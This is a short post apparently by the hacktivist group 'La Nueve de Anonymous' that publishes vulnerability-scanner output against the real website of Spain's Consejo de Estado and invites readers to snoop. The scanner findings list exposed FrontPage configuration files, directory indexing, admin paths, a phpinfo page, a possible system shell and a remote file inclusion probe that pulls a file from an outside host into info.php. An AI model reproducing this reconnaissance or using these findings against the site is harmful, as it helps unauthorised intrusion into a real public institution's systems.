OSVDB en la Web del Consejo de Estado

1. _ ___ _
2. | | / _ \ | | /\
3. | | __ _ | (_) | __| | ___ / \ _ __ ___ _ __
4. | | / _` | \__, | / _` |/ _ \ / /\ \ | '_ \ / _ \| '_ \
5. | |___| (_| | / / | (_| | __/ / ____ \| | | | (_) | | | |
6. |______\__,_| /_/ \__,_|\___| /_/ \_|_| |_|\___/|_| |_|
7.  
8. OSVDB en la Web del Consejo de Estado
9. ##########################################
10.  
11. Parece que en el Consejo de Estado tienen algunos asuntillos a la vista de todo el mundo... Como una nunca sabe si de esta gente se puede fiar, os dejamos los encales por si queréis cotillear ;-)
12.  
13. + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
14. + OSVDB-3092: /_vti_pvt/deptodoc.btr: FrontPage file found. This may contain useful information.
15. + OSVDB-3092: /_vti_pvt/doctodep.btr: FrontPage file found. This may contain useful information.
16. + OSVDB-473: /_vti_pvt/botinfs.cnf: FrontPage file found. This may contain useful information.
17. + OSVDB-473: /_vti_pvt/bots.cnf: FrontPage file found. This may contain useful information.
18. + OSVDB-473: /_vti_pvt/service.cnf: Contains meta-information about the web server Remove or ACL if FrontPage is not being used.
19. + OSVDB-473: /_vti_pvt/services.cnf: Contains the list of subwebs. Remove or ACL if FrontPage is not being used. May reveal server version if Admin has changed it.
20. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
21. + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
22. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
23. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
24. + OSVDB-3268: /pdf/: Directory indexing found.
25. + OSVDB-3092: /admin/: This might be interesting...
26. + OSVDB-3268: /img/: Directory indexing found.
27. + OSVDB-3092: /img/: This might be interesting...
28. + OSVDB-3092: /test.htm: This might be interesting...
29. + OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
30. + OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
31. + OSVDB-3268: /_private/: Directory indexing found.
32. + OSVDB-3233: /_private/: FrontPage directory found.
33. + /info.php: Output from the phpinfo() function was found.
34. + OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
35. + OSVDB-3268: /images/: Directory indexing found.
36. + OSVDB-3268: /docs/: Directory indexing found.
37. + OSVDB-3268: /styles/: Directory indexing found.
38. + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
39. + OSVDB-3092: /Admin/: This might be interesting...
40. + /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
41. + OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
42. + /_vti_pvt/structure.cnf: FrontPage/Sharepointfile available.
43.  
44. Inglorious /b/asterds
45. La Nueve de Anonymous
46.  
47. #yak42